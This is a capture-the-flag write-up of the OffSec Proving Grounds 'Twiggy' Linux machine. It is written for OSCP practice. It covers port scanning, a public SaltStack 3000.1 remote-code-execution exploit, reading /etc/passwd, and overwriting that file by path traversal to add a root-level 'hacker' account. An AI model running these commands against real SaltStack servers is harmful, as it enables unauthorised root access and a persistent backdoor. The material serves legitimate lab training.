Skip to content

Latest commit

 

History

History
90 lines (62 loc) · 2.09 KB

2023-08-27-Proving_grounds_Practice-Twiggy.md

File metadata and controls

90 lines (62 loc) · 2.09 KB
Raw
title layout date tag writeups hidden author description
Proving grounds Practice: Twiggy
post
2023-08-27 01:00
CTF
Offsec labs
OSCP
Writeup
Linux
Pg-Practice
true
true
Naveen
Offsec proving grounds practice linux machine writeup

Nmap

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
53/tcp   open  domain  NLnet Labs NSD
80/tcp   open  http    nginx 1.16.1
4505/tcp open  zmtp    ZeroMQ ZMTP 2.0
4506/tcp open  zmtp    ZeroMQ ZMTP 2.0
8000/tcp open  http    nginx 1.16.1

Web

PORT: 80

img

PORT: 8000

img

The SaltStack Salt REST API is running.

img

SaltStack is vulnerable to Saltstack 3000.1 - Remote Code Execution

Exploitation

python exploit.py --master 192.168.174.62 --read /etc/passwd

img

unable to obtain reverse shell using the --exec command in the exploit but we will be able to create and add our own new user account to the /etc/passwd file.

Create new user

openssl passwd hacked
$1$iBeMKMaU$.O3VYqCZxUvapPL.OQ97/1

hacked is the password.

Add the following to the /etc/passwd content we have extracted from the attacking machine.

hacker:$1$iBeMKMaU$.O3VYqCZxUvapPL.OQ97/1:0:0:root:/root:/bin/bash

Writing /etc/passwd file

python exploit.py --master 192.168.174.62 --upload-src passwd --upload-dest ../../../../../../../../../../etc/passwd

img

Verify the user existence

img

SSH to the attacking machine using the username as hacker and password hacked.

img

Root Obtained

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.